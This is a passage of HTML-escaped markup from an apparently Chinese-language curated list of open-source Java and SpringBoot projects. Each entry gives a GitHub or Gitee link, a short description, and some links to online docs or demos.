            &lt;a href=&quot;https://github.com/Snailclimb/JavaGuide&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JavaGuide&lt;/a&gt; - 「Java学习+面试指南」一份涵盖大部分 Java 程序员所需要掌握的核心知识。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/sohutv/cachecloud&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cachecloud&lt;/a&gt; - &lt;code&gt;Redis&lt;/code&gt; 私有云平台 ：支持 &lt;code&gt;Redis&lt;/code&gt; 多种架构(&lt;code&gt;Standalone&lt;/code&gt;、&lt;code&gt;Sentinel&lt;/code&gt;、&lt;code&gt;Cluster&lt;/code&gt;)高效管理、有效降低大规模 &lt;code&gt;Redis&lt;/code&gt; 运维成本，提升资源管控能力和利用率。平台提供快速搭建/迁移，运维管理，弹性伸缩，统计监控，客户端整合接入等功能。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/alibaba/jetcache&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jetcache&lt;/a&gt; - 一个 &lt;code&gt;Java&lt;/code&gt; 缓存框架。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/fuzhengwei/CodeGuide&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;CodeGuide&lt;/a&gt; - 互联网 &lt;code&gt;Java&lt;/code&gt; 开发的学习历程技术汇总。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/doocs/advanced-java&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;advanced-java&lt;/a&gt; - 互联网 &lt;code&gt;Java&lt;/code&gt; 工程师进阶知识完全扫盲：涵盖高并发、分布式、高可用、微服务、海量数据处理等领域知识。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/PowerJob/PowerJob&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;PowerJob&lt;/a&gt; - 分布式调度与计算框架。&lt;a href=&quot;http://try.powerjob.tech/#/oms/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.yuque.com/powerjob/guidence/intro&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hello-java-maker/JavaInterview&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JavaInterview&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; 面试 + &lt;code&gt;Java&lt;/code&gt; 后端技术学习指南。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/AobingJava/JavaFamily&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JavaFamily&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; 面试 + &lt;code&gt;Java&lt;/code&gt; 学习指南。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Frooodle/Stirling-PDF&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Stirling-PDF&lt;/a&gt; - 实现对 &lt;code&gt;PDF&lt;/code&gt; 的各种操作。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/youlookwhat/DesignPattern&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;DesignPattern&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; 23 种&lt;strong&gt;设计模式&lt;/strong&gt;全归纳。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/doocs/jvm&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jvm&lt;/a&gt; - &lt;code&gt;JVM&lt;/code&gt; 底层原理最全知识总结。&lt;a href=&quot;https://doocs.github.io/jvm/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/justauth/JustAuth&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JustAuth&lt;/a&gt; - 小而全而美的第三方登录开源组件。&lt;a href=&quot;https://www.justauth.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/majianzheng/jarboot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jarboot&lt;/a&gt; - 一个 &lt;code&gt;Java&lt;/code&gt; 进程启停、管理、诊断的平台，可以管理、守护、监控及诊断本地和远程的 &lt;code&gt;Java&lt;/code&gt; 进程。&lt;a href=&quot;https://www.yuque.com/jarboot/usage&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/x-file-storage&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;x-file-storage&lt;/a&gt; - 一行代码将文件存储到各个 &lt;code&gt;OSS&lt;/code&gt; 平台中。&lt;a href=&quot;https://x-file-storage.xuyanwu.cn/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/MaxKey&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MaxKey&lt;/a&gt; - 单点登录认证系统。&lt;a href=&quot;https://www.maxkey.top/doc/docs/intro/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/o2oa/o2oa&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;o2oa&lt;/a&gt; - 开源 &lt;code&gt;OA&lt;/code&gt; 系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/TongchengOpenSource/smart-doc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;smart-doc&lt;/a&gt; - 一个无侵入式的 &lt;code&gt;Api&lt;/code&gt; 接口文档生成器。&lt;a href=&quot;https://smart-doc-group.github.io/#/zh-cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/aalansehaiyang/technology-talk&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;technology-talk&lt;/a&gt; - 【大厂面试专栏】一份 &lt;code&gt;Java&lt;/code&gt; 程序员的技术指南，涵盖面试题、系统架构、职场锦囊、主流中间件等。&lt;a href=&quot;https://offercome.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/apache/dolphinscheduler&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dolphinscheduler&lt;/a&gt; - 一个分布式和可扩展的开源工作流协调平台，具有强大的 &lt;code&gt;DAG&lt;/code&gt; 可视化界面。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bin392328206/six-finger&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;six-finger&lt;/a&gt; - 从 &lt;code&gt;Java&lt;/code&gt; 基础、&lt;code&gt;JavaWeb&lt;/code&gt; 基础到常用的框架再到面试题、微服务、分布式、大数据都有完整的教程，几乎涵盖了 &lt;code&gt;Java&lt;/code&gt; 必备的知识点。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/pingfangushi/screw&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;screw&lt;/a&gt; - 简洁好用的数据库表结构文档生成器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/makejavas/EasyCode&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;EasyCode&lt;/a&gt; - 基于 &lt;code&gt;IntelliJ IDEA&lt;/code&gt; 开发的代码生成插件，支持自定义任意模板（&lt;code&gt;Java&lt;/code&gt;，&lt;code&gt;Html&lt;/code&gt;，&lt;code&gt;Js&lt;/code&gt;，&lt;code&gt;Xml&lt;/code&gt;）。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/sohutv/mqcloud&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mqcloud&lt;/a&gt; - &lt;code&gt;RocketMQ&lt;/code&gt; 企业级一站式服务平台。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ofdrw/ofdrw&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ofdrw&lt;/a&gt; - 开源的 &lt;code&gt;OFD&lt;/code&gt; 处理库，支持文档生成、数字签名、文档保护、文档合并、转换、导出等功能。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/iluwatar/java-design-patterns&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;java-design-patterns&lt;/a&gt; - 设计模式 &lt;code&gt;Java&lt;/code&gt; 版。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xenv/gushici&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gushici&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/xenv/gushici?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/xenv/gushici?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/xenv/gushici?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/xenv/gushici?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/xenv/gushici&quot; data-origin=&quot;https://img.shields.io/github/license/xenv/gushici&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/xenv/gushici&quot; data-origin=&quot;https://img.shields.io/github/last-commit/xenv/gushici&quot; alt=&quot;&quot;/&gt; - 采用 &lt;code&gt;Vert.x&lt;/code&gt; + &lt;code&gt;Redis&lt;/code&gt; 全异步开发的一个可以随机返回一句古诗词名句的接口。&lt;a href=&quot;https://www.jinrishici.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/864381832/xJavaFxTool&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;xJavaFxTool&lt;/a&gt; - 基于 &lt;code&gt;JavaFx&lt;/code&gt; 搭建的实用小工具集合。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/crisxuan/bestJavaer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;bestJavaer&lt;/a&gt; - 一个成为更好的 &lt;code&gt;Java&lt;/code&gt; 程序员的系列教程。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/neutrino-proxy&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;neutrino-proxy&lt;/a&gt; - 一个基于 &lt;code&gt;Netty&lt;/code&gt; 的、开源的 &lt;code&gt;Java&lt;/code&gt; &lt;strong&gt;内网穿透&lt;/strong&gt;项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/SMS4J&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;SMS4J&lt;/a&gt; - 短信聚合框架，帮您轻松集成多家短信服务，解决接入多个短信 &lt;code&gt;SDK&lt;/code&gt; 的繁琐流程。&lt;a href=&quot;https://sms4j.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;springboot-项目&quot;&gt;
    &lt;a href=&quot;?id=springboot-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;springboot-项目&quot;&gt;&lt;code&gt;SpringBoot&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/vector4wang/spring-boot-quick&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;spring-boot-quick&lt;/a&gt; - 基于 &lt;code&gt;SpringBoot&lt;/code&gt; 的&lt;strong&gt;快速学习&lt;/strong&gt;示例，整合开源框架，如：&lt;code&gt;RabbitMQ&lt;/code&gt;、&lt;code&gt;Kafka&lt;/code&gt;、&lt;code&gt;Jpa&lt;/code&gt;、&lt;code&gt;Redis&lt;/code&gt;、&lt;code&gt;Oauth2&lt;/code&gt;、&lt;code&gt;Swagger&lt;/code&gt;、&lt;code&gt;Jsp&lt;/code&gt;、&lt;code&gt;Docker&lt;/code&gt;、&lt;code&gt;k3s&lt;/code&gt;、&lt;code&gt;k3d&lt;/code&gt;、&lt;code&gt;k8s&lt;/code&gt;、&lt;code&gt;Mybatis&lt;/code&gt; 加解密插件、异常处理、日志输出、多模块开发、多环境打包、缓存 &lt;code&gt;Cache&lt;/code&gt;、爬虫、&lt;code&gt;JWT&lt;/code&gt;、&lt;code&gt;GraphQL&lt;/code&gt;、&lt;code&gt;Dubbo&lt;/code&gt;、 &amp;nbsp; &amp;nbsp;&lt;code&gt;Zookeeper&lt;/code&gt; 和 &lt;code&gt;Async&lt;/code&gt; 等等。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/kekingcn/kkFileView&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;kkFileView&lt;/a&gt; - 基于 &lt;code&gt;Spring Boot&lt;/code&gt; 的&lt;strong&gt;文件在线体验&lt;/strong&gt;项目。&lt;a href=&quot;https://file.kkview.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://kkfileview.keking.cn/zh-cn/index.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/moshowgame/SpringBootCodeGenerator&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;SpringBootCodeGenerator&lt;/a&gt; - 基于 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Freemarker&lt;/code&gt; 的 &lt;code&gt;JAVA&lt;/code&gt; &lt;strong&gt;代码生成器&lt;/strong&gt;，以释放双手为目的，支持 &lt;code&gt;MySQL/Oracle/PgSQL&lt;/code&gt; 三大数据库， 用&lt;code&gt;DDL-SQL&lt;/code&gt; 语句生成 &lt;code&gt;JPA&lt;/code&gt;、&lt;code&gt;JdbcTemplate&lt;/code&gt;、&lt;code&gt;Mybatis&lt;/code&gt;、&lt;code&gt;MybatisPlus&lt;/code&gt;、&lt;code&gt;BeetlSQL&lt;/code&gt; 等相关代码。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jetlinks/jetlinks-community&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jetlinks-community&lt;/a&gt; - 基于 &lt;code&gt;Java8&lt;/code&gt;、&lt;code&gt;Spring Boot 2.x&lt;/code&gt;、&lt;code&gt;WebFlux&lt;/code&gt;、&lt;code&gt;Netty&lt;/code&gt;、&lt;code&gt;Vert.x&lt;/code&gt;、&lt;code&gt;Reactor&lt;/code&gt; 等开发，是一个全响应式的&lt;strong&gt;企业级物联网平台&lt;/strong&gt;。支持统一物模型管理，多种设备，多种厂家，统一管理。统一设备连接管理，多协议适配(&lt;code&gt;TCP&lt;/code&gt;、&lt;code&gt;MQTT&lt;/code&gt;、&lt;code&gt;UDP&lt;/code&gt;、&lt;code&gt;CoAP&lt;/code&gt;、&lt;code&gt;HTTP&lt;/code&gt;等)。屏蔽网络编程复杂性，灵活接入不同厂家不同协议等设备；实时数据处理，设备告警，消息通知,数据转发，地理位置,数据可视化等。&lt;a href=&quot;https://www.jetlinks.cn/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ZHENFENG13/spring-boot-projects&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;spring-boot-projects&lt;/a&gt; - &lt;code&gt;Spring Boot&lt;/code&gt; 的&lt;strong&gt;入门学习教程&lt;/strong&gt;、&lt;strong&gt;实战项目教程&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dyc87112/SpringBoot-Learning&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;SpringBoot-Learning&lt;/a&gt; - &lt;code&gt;Spring Boot&lt;/code&gt; &lt;strong&gt;教程&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jeecgboot/JimuReport&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JimuReport&lt;/a&gt; - 「低代码可视化报表」类似 &lt;code&gt;excel&lt;/code&gt; 操作风格，在线拖拽完成报表设计。&lt;a href=&quot;http://jimureport.com/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://help.jeecg.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xkcoding/spring-boot-demo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;spring-boot-demo&lt;/a&gt; - 深入学习并实战 &lt;code&gt;Spring Boot&lt;/code&gt; 的项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wuyouzhuguli/SpringAll&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;SpringAll&lt;/a&gt; - &lt;code&gt;Spring&lt;/code&gt; 全家桶学习项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jeecgboot/jeecg-boot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jeecg-boot&lt;/a&gt; - 一款基于代码生成器的&lt;strong&gt;低代码开发平台&lt;/strong&gt;。&lt;a href=&quot;http://boot3.jeecg.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.jeecg.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/yzcheng90/X-SpringBoot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;X-SpringBoot&lt;/a&gt; - 一个轻量级的 &lt;code&gt;Java&lt;/code&gt; 快速开发平台，能快速开发项目并交付【接私活利器】。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/PlayEdu/PlayEdu&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;PlayEdu&lt;/a&gt; - 一款适用于搭建内部培训平台的开源系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wwwlike/vlife&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vlife&lt;/a&gt; - 企业级低代码快速开发平台。&lt;a href=&quot;http://admin.vlife.cc/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;http://vlife.cc/guide&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/davidfantasy/mybatis-plus-generator-ui&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mybatis-plus-generator-ui&lt;/a&gt; - 对 &lt;code&gt;Mybatis-Plus-Generator&lt;/code&gt; 进行封装，通过 &lt;code&gt;Web UI&lt;/code&gt; 快速生成兼容 &lt;code&gt;Spring Boot&lt;/code&gt;，&lt;code&gt;Mybatis-Plus&lt;/code&gt; 框架的各类业务代码。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/fengwenyi/mybatis-plus-code-generator&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mybatis-plus-code-generator&lt;/a&gt; - &lt;code&gt;MyBatis-Plus&lt;/code&gt; 代码生成器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/itwanger/paicoding&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;paicoding&lt;/a&gt; - 一个基于 &lt;code&gt;Spring Boot&lt;/code&gt;、&lt;code&gt;MyBatis-Plus&lt;/code&gt;、&lt;code&gt;MySQL&lt;/code&gt;、&lt;code&gt;Redis&lt;/code&gt;、&lt;code&gt;ElasticSearch&lt;/code&gt;、&lt;code&gt;MongoDB&lt;/code&gt;、&lt;code&gt;Docker&lt;/code&gt;、&lt;code&gt;RabbitMQ&lt;/code&gt; 等技术栈实现的&lt;strong&gt;社区系统&lt;/strong&gt;。&lt;a href=&quot;https://paicoding.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hs-web/hsweb-framework&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;hsweb-framework&lt;/a&gt; - 一个基于 &lt;code&gt;Spring-Boot 2.x&lt;/code&gt; 开发，首个使用全&lt;strong&gt;响应式编程&lt;/strong&gt;的企业级后台管理系统基础项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/kaifangqian/kaifangqian-base&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;open-sign-old&lt;/a&gt; - 开放签电子签章系统。&lt;a href=&quot;https://demo.kaifangqian.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cjbi/admin3&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;admin3&lt;/a&gt; - 一个轻巧的后台管理框架，项目后端基于 &lt;code&gt;Java17&lt;/code&gt;、&lt;code&gt;SpringBoot 3.0&lt;/code&gt;，前端基于 &lt;code&gt;TypeScript&lt;/code&gt;、&lt;code&gt;Vite3&lt;/code&gt;、&lt;code&gt;Vue3&lt;/code&gt;、&lt;code&gt;Element Plus&lt;/code&gt;.
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/onlyGuo/nginx-gui&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nginx-gui&lt;/a&gt; - 一个基于 &lt;code&gt;SpringBoot&lt;/code&gt; 实现的 &lt;code&gt;Nginx&lt;/code&gt; 可视化管理项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/topiam/eiam&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;eiam&lt;/a&gt; - 基于 &lt;code&gt;SpringBoot3&lt;/code&gt; 的开源 &lt;code&gt;IAM/IDaaS&lt;/code&gt; 身份管理平台，实现用户全生命周期的管理、统一认证和单点登录、为数字身份安全赋能。&lt;a href=&quot;https://eiam.topiam.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/YeDaxia/JApiDocs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JApiDocs&lt;/a&gt; - 无需额外注解的 &lt;code&gt;SpringBoot API&lt;/code&gt; 文档生成工具。&lt;a href=&quot;https://japidocs.agilestudio.cn/#/zh-cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/jianmu-dev/jianmu&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jianmu&lt;/a&gt; - 一个面向 &lt;code&gt;DevOps&lt;/code&gt; 领域的极易扩展的开源无代码(图形化)/低代码( &lt;code&gt;GitOps&lt;/code&gt; )工具。&lt;a href=&quot;https://ci.jianmu.dev/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/1024-lab/smart-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;smart-admin&lt;/a&gt; - 基于 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Sa-Token&lt;/code&gt; + &lt;code&gt;Mybatis-Plus&lt;/code&gt; 和 &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;Vite5&lt;/code&gt; + &lt;code&gt;Ant Design Vue 4.x&lt;/code&gt; 中后台解决方案。&lt;a href=&quot;https://preview.smartadmin.vip/#/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://smartadmin.vip/views/v3/base/About.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/makunet/maku-generator&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;maku-generator&lt;/a&gt; - 一款低代码生成器。&lt;a href=&quot;https://demo.maku.net/maku-generator/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://maku.net/docs/maku-boot/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
